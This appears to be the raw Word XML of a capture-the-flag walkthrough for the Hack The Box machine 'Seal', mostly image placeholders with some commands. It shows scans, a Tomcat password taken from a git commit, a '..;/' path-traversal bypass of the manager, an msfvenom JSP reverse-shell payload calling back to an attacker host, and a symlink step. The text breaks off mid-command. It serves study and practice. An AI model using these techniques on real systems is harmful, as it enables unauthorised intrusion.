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FE5" w:rsidRDefault="00F70387">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3805555"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="2" name="Picture 2" descr="https://threatninja.net/wp-content/uploads/2021/07/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-0003-07-24-12.23.32-e162711913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hreatninja.net/wp-content/uploads/2021/07/%E3%82%B9%E3%82%AF%E3%83%AA%E3%83%BC%E3%83%B3%E3%82%B7%E3%83%A7%E3%83%83%E3%83%88-0003-07-24-12.23.32-e162711913392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17F" w:rsidRDefault="00A7217F"/>
    <w:p w:rsidR="00A7217F" w:rsidRDefault="00A7217F" w:rsidP="00A7217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A7217F" w:rsidRDefault="00A7217F" w:rsidP="00A7217F">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -A 10.10.10.250</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F70387" w:rsidRDefault="00AC5ADC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33C12F92" wp14:editId="2DFA0C10">
            <wp:extent cx="5943600" cy="450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DC" w:rsidRDefault="002D4737">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24BBB5C1" wp14:editId="106C05F9">
            <wp:extent cx="5943600" cy="3449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16" w:rsidRDefault="00FC3F16" w:rsidP="00FC3F16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C3F16" w:rsidRDefault="00FC3F16" w:rsidP="00FC3F16">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cat  /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/hosts | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.10.10.250</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F76E6A" w:rsidRDefault="00DF025D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C6DB7B6" wp14:editId="0F72D848">
            <wp:extent cx="3114675" cy="504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5D" w:rsidRDefault="00DF025D"/>
    <w:p w:rsidR="002D4737" w:rsidRDefault="00A50010">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="000B6939">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://seal.htb:8080/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00A50010" w:rsidRDefault="008F57D7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D57120" wp14:editId="4FCD9312">
            <wp:extent cx="5943600" cy="2366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32" w:rsidRDefault="00205B32"/>
    <w:p w:rsidR="00205B32" w:rsidRDefault="00205B32">
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="000B6939">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://seal.htb:8080/register</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00205B32" w:rsidRDefault="00205B32"/>
    <w:p w:rsidR="008F57D7" w:rsidRDefault="00EF0CED">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57638977" wp14:editId="1EEC6522">
            <wp:extent cx="5943600" cy="448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ED" w:rsidRDefault="004B6203">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12ED38E8" wp14:editId="33D61E11">
            <wp:extent cx="5943600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3" w:rsidRDefault="00DB6394">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59567BFD" wp14:editId="381A6D34">
            <wp:extent cx="5943600" cy="4848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94" w:rsidRDefault="00277DEF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FEE6953" wp14:editId="08628227">
            <wp:extent cx="3409950" cy="116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EF" w:rsidRDefault="003F00A8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ECAA79A" wp14:editId="7128AB4B">
            <wp:extent cx="3267075" cy="742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A8" w:rsidRDefault="00573556">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="309D177E" wp14:editId="5E76F3B9">
            <wp:extent cx="5943600" cy="2214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56" w:rsidRDefault="00704CF2">
      <w:r>
        <w:t>Here click on commit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00704CF2" w:rsidRDefault="000E3859">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B803851" wp14:editId="55129C9A">
            <wp:extent cx="5943600" cy="2146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9" w:rsidRDefault="00705536">
      <w:r>
        <w:t>Username: tomcat</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00705536" w:rsidRDefault="00705536">
      <w:r>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00705536">
        <w:t>42MrHBf*</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00705536">
        <w:t>z8{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00705536">
        <w:t>Z%</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D500D1" w:rsidRDefault="00D500D1"/>
    <w:p w:rsidR="00D6581B" w:rsidRDefault="00D6581B" w:rsidP="00D6581B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D6581B" w:rsidRDefault="00D6581B" w:rsidP="00D6581B">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feroxbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> https://seal.htb -k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00084299" w:rsidRDefault="00084299"/>
    <w:p w:rsidR="000C59C2" w:rsidRDefault="0046253A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0ACF1DEA" wp14:editId="33C56F30">
            <wp:extent cx="5943600" cy="3044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61" w:rsidRDefault="007B1961"/>
    <w:p w:rsidR="00FD2AE4" w:rsidRDefault="00322E89">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3ECE3B68" wp14:editId="7B1881AB">
            <wp:extent cx="5943600" cy="4617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7E" w:rsidRDefault="0028667E" w:rsidP="0028667E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22E89" w:rsidRDefault="0028667E" w:rsidP="0028667E">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>feroxbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> https://seal.htb/manager -k</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0028667E" w:rsidRDefault="00DB5022" w:rsidP="0028667E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6BF3196E" wp14:editId="69418015">
            <wp:extent cx="5943600" cy="3791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22" w:rsidRDefault="00B004F0" w:rsidP="0028667E">
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="000B6939">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://seal.htb/manager/status</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00B004F0" w:rsidRDefault="00624335" w:rsidP="0028667E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D86504B" wp14:editId="2FE546BC">
            <wp:extent cx="5943600" cy="19951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35" w:rsidRDefault="006B782F" w:rsidP="0028667E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B9B716" wp14:editId="03539AF1">
            <wp:extent cx="5943600" cy="2903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2F" w:rsidRDefault="00B5141D" w:rsidP="0028667E">
      <w:r>
        <w:t>Now path traversal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B5141D" w:rsidRDefault="00AC307E" w:rsidP="0028667E">
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="000B6939">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://seal.htb/manager/status/..;/html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AC307E" w:rsidRDefault="003D64E4" w:rsidP="0028667E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="12DCB55B" wp14:editId="2BF904E8">
            <wp:extent cx="5943600" cy="2847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17" w:rsidRDefault="00720017" w:rsidP="0072001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D64E4" w:rsidRDefault="00720017" w:rsidP="00720017">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -p java/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jsp_shell_reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=10.10.14.</w:t>
      </w:r>
      <w:r w:rsidR="00194C16">
        <w:t xml:space="preserve">11 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194C16">
        <w:t>lport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194C16">
        <w:t xml:space="preserve">=1337 -f war &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194C16">
        <w:t>pentest</w:t>
      </w:r>
      <w:r>
        <w:t>.war</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00CB3D33" w:rsidRDefault="00CB3D33" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C02407F" wp14:editId="359E6813">
            <wp:extent cx="5943600" cy="636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17" w:rsidRDefault="00720017" w:rsidP="00720017"/>
    <w:p w:rsidR="006F3EF1" w:rsidRDefault="003C3DBB" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63C10BA3" wp14:editId="31924A65">
            <wp:extent cx="5943600" cy="713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BB" w:rsidRDefault="000B651A" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27A07FB1" wp14:editId="481AABF6">
            <wp:extent cx="5943600" cy="805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A" w:rsidRDefault="00695E75" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CA1BD95" wp14:editId="3E678BC3">
            <wp:extent cx="5943600" cy="91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75" w:rsidRDefault="00FE5A9F" w:rsidP="00720017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252A34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252A34"/>
        </w:rPr>
        <w:t>However, because we are using path traversal to get to this page we will not be able to upload directly:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FE5A9F" w:rsidRDefault="007E5FDA" w:rsidP="00720017">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252A34"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:shd w:val="clear" w:color="auto" w:fill="252A34"/>
        </w:rPr>
        <w:t>We can get around this by intercepting with Burp and changing the upload URL like before</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E33C2E" w:rsidRDefault="00C60CA7" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E801B8" wp14:editId="20DDBDD1">
            <wp:extent cx="5943600" cy="22040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A7" w:rsidRDefault="00C60CA7" w:rsidP="00720017"/>
    <w:p w:rsidR="00890123" w:rsidRDefault="00F65FA9" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="79EEDE46" wp14:editId="7F28B00E">
            <wp:extent cx="5943600" cy="22625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A9" w:rsidRDefault="00D51B5F" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="024EA913" wp14:editId="4E938156">
            <wp:extent cx="5943600" cy="26828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5F" w:rsidRDefault="00F95983" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65CA5DFD" wp14:editId="00ABD442">
            <wp:extent cx="3152775" cy="609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83" w:rsidRDefault="00B12442" w:rsidP="00720017">
      <w:r w:rsidRPr="00B12442">
        <w:t xml:space="preserve">python3 -c 'import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B12442">
        <w:t>pty</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B12442">
        <w:t>;pty.spawn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B12442">
        <w:t>("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B12442" w:rsidRDefault="00D46234" w:rsidP="00720017">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44ED0BAA" wp14:editId="4B07A1C3">
            <wp:extent cx="4724400" cy="981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99" w:rsidRDefault="00A37499" w:rsidP="00A37499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D46234" w:rsidRDefault="00A37499" w:rsidP="00A37499">
      <w:r>
        <w:t xml:space="preserve">└─# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> raw -echo; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>fg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00E311A6" w:rsidRDefault="00E311A6" w:rsidP="00E311A6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/tomcat9$ export TERM=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xterm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A37499" w:rsidRDefault="00E311A6" w:rsidP="00E311A6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/lib/tomcat9$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stty</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> rows 52 cols 237</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E311A6" w:rsidRDefault="003918BF" w:rsidP="00E311A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E685ABE" wp14:editId="29720BC0">
            <wp:extent cx="4381500" cy="1171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BF" w:rsidRDefault="001E77C8" w:rsidP="00E311A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>/lib/tomcat9$ ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>luis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001E77C8">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E77C8" w:rsidRDefault="00A2578E" w:rsidP="00E311A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5799CFCE" wp14:editId="71CD2225">
            <wp:extent cx="5943600" cy="25749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BB" w:rsidRDefault="00D13DBB" w:rsidP="00E311A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>/lib/tomcat9$ ls -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t xml:space="preserve"> /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>luis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>ansible</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D13DBB">
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A2578E" w:rsidRDefault="00AE78A3" w:rsidP="00E311A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0348D019" wp14:editId="08111066">
            <wp:extent cx="4600575" cy="990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A3" w:rsidRDefault="008C270A" w:rsidP="00E311A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C270A">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C270A">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C270A">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C270A">
        <w:t xml:space="preserve">/lib/tomcat9$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008C270A">
        <w:t>ps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008C270A">
        <w:t xml:space="preserve"> aux</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C270A" w:rsidRDefault="00AF6CB1" w:rsidP="00E311A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="518E4F83" wp14:editId="763FFBE8">
            <wp:extent cx="5943600" cy="5889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B1" w:rsidRDefault="00F53CE9" w:rsidP="00E311A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4AB117" wp14:editId="5619C70D">
            <wp:extent cx="5943600" cy="7004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9" w:rsidRDefault="00D5462D" w:rsidP="00E311A6">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5462D">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5462D">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5462D">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D5462D">
        <w:t>/lib/tomcat9$ cat /opt/backups/playbook/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D5462D">
        <w:t>run.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00D5462D" w:rsidRDefault="00EF59CA" w:rsidP="00E311A6">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41483378" wp14:editId="61EFBB47">
            <wp:extent cx="5943600" cy="1465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66" w:rsidRDefault="00772B66" w:rsidP="00772B66">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/tomcat9$ cd /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/tomcat9/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/ROOT/admin/dashboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF59CA" w:rsidRDefault="00772B66" w:rsidP="00772B66">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/lib/tomcat9/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/ROOT/admin/dashboard$ ls </w:t>
      </w:r>
      <w:r>
        <w:t>–</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lsa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00772B66" w:rsidRDefault="007E7BDC" w:rsidP="00772B66">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F1F2513" wp14:editId="7EDF3EF2">
            <wp:extent cx="5943600" cy="16090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DC" w:rsidRDefault="00636C68" w:rsidP="00772B66">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>tomcat@seal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>/lib/tomcat9/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>/ROOT/admin/dashboard$ ln -s /home/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>luis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00636C68">
        <w:t>/.</w:t>
      </w:r>
